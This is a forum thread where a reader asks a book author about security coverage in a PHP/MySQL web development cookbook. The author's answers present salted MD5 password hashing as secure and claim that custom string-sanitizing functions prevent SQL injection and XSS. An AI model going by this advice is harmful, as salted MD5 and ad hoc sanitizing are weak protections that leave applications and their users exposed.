Win a copy of Functional Reactive Programming this week in the Other Languages forum!
  • Post Reply
  • Bookmark Topic Watch Topic
  • New Topic

Web Developer's Cookbook - Questions

 
Raghavan Muthu
Ranch Hand
Posts: 3381
Mac MySQL Database Tomcat Server
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Hello Robin Nixon,

Congratulations on your new book. It seems to be a catchy one as it deals with scenarios and solutions rather than concepts being explained theoretically.

I have a few questions.

1. Have you covered the security aspects of a PHP based web application?
2. How about SQL Injection, XSS etc.,?
3. Is it only based on HTML5 or prior versions also being covered?
4. Does it address the batch upload of MySQL in PHP?
5. Does it explain the file attachment aspect of PHP?

These are the areas mostly developers feel left untouched in the books and google around for solutions.

Congratulations once again and thanks for attending the Book Promo

I am sure you would have a nice time ranching

Cheers,
Raghavan alias Saravanan M
 
Robin Nixon
Author
Ranch Hand
Posts: 48
Android Eclipse IDE PHP
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Hi Raghavan,

In answer to your questions:

1. Yes, security is incorporated wherever necessary. For exanple, salting is used to obfuscate any passwords saved in MySQL (which are then stored as unencryptable MD5s).
2. Two recipes provided are SanitizeString() and MySQLSanitizeString(), which will prevent SQL injection/XSS. Recipes in both JavaScript and PHP are also provided to thoroughly process any user input, and which can strip out anything malicious.
3. There is not much HTML5 in these recipes, since most of the tasks are easily accomplished in standard HTML.
4. A PHP recipe is provided to handle file uploads to a web server.

- Robin.
 
Raghavan Muthu
Ranch Hand
Posts: 3381
Mac MySQL Database Tomcat Server
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Thats a good thing Robin. Thank you

As per your reply to the welcome thread, MySQLSanitizeString() is of your own codework/toolkit. Is it?
 
Aamir Sayid
Greenhorn
Posts: 10
Java Spring Ubuntu
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Robin Nixon wrote:Hi Aamir,

You need a basic understanding of each of the technologies. But only enough to understand basic syntax, how to incorporate the external functions or classes and how to call them.

As long as you can create a PHP file, for example, and include the WDC.php recipe file, you can then simply call the recipes you need.

- Robin.


Thank you for the answer, Robin!!! I seriously appreciate the effort you put into writing such a useful book.

PS - The question and the answer were in the Welcome thread.
 
Robin Nixon
Author
Ranch Hand
Posts: 48
Android Eclipse IDE PHP
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Raghavan Muthu wrote:Thats a good thing Robin. Thank you

As per your reply to the welcome thread, MySQLSanitizeString() is of your own codework/toolkit. Is it?


Yes, it strings together built-in PHP functions (and deals with magic quotes if they are being used) to result in a single function for sanitizing with MySQL.
 
  • Post Reply
  • Bookmark Topic Watch Topic
  • New Topic